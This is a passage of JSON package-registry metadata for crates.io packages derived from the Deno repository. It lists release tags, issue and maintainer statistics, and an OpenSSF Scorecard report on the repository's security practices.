0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-09-07T01:53:11.040Z","dependent_packages_count":0,"downloads":2238,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":96.24247153202799,"dependent_repos_count":25.13167199044159,"dependent_packages_count":33.328253395430494,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":51.567465639300025},"purl":"pkg:cargo/thousand_birds_deno","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/thousand_birds_deno","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/thousand_birds_deno","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/thousand_birds_deno/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-09-06T13:00:35.403Z","issues_count":6650,"pull_requests_count":9667,"avg_time_to_close_issue":17138573.200682055,"avg_time_to_close_pull_request":1530522.5908357133,"issues_closed_count":3810,"pull_requests_closed_count":8052,"pull_request_authors_count":589,"issue_authors_count":2489,"avg_comments_per_issue":2.5046616541353384,"avg_comments_per_pull_request":0.7208027309403124,"merged_pull_requests_count":7030,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":673,"past_year_pull_requests_count":1190,"past_year_avg_time_to_close_issue":1344289.2103004293,"past_year_avg_time_to_close_pull_request":1305317.8687782804,"past_year_issues_closed_count":233,"past_year_pull_requests_closed_count":663,"past_year_pull_request_authors_count":190,"past_year_issue_authors_count":373,"past_year_avg_comments_per_issue":1.2332838038632987,"past_year_avg_comments_per_pull_request":1.134453781512605,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":2,"past_year_merged_pull_requests_count":496,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1803,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1731,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":285,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":268,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":149,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":396,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":183,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"crowlKats","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"devsnek","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/thousand_birds_deno/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/thousand_birds_deno/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/thousand_birds_deno/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/thousand_birds_deno/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/thousand_birds_deno/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/thousand_birds_deno/codemeta","maintainers":[{"uuid":"222500","login":"kvey","name":"Colton Pierson","email":null,"url":"https://github.com/kvey","packages_count":24,"html_url":"https://crates.io/users/kvey","role":null,"created_at":"2024-10-09T05:51:42.097Z","updated_at":"2024-10-09T05:51:42.097Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/kvey/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":11092996,"name":"deno_permissions_extended","ecosystem":"cargo","description":"Provides the deno permissions implementation.","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":5,"first_release_published_at":"2024-11-29T00:34:12.074Z","latest_release_published_at":"2024-11-29T21:08:52.315Z","latest_release_number":"0.41.0","last_synced_at":"2026-09-07T22:55:50.068Z","created_at":"2024-11-29T00:46:36.645Z","updated_at":"2026-09-07T22:55:50.069Z","registry_url":"https://crates.io/crates/deno_permissions_extended/","install_command":"cargo install deno_permissions_extended","documentation_url":"https://docs.rs/deno_permissions_extended/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using 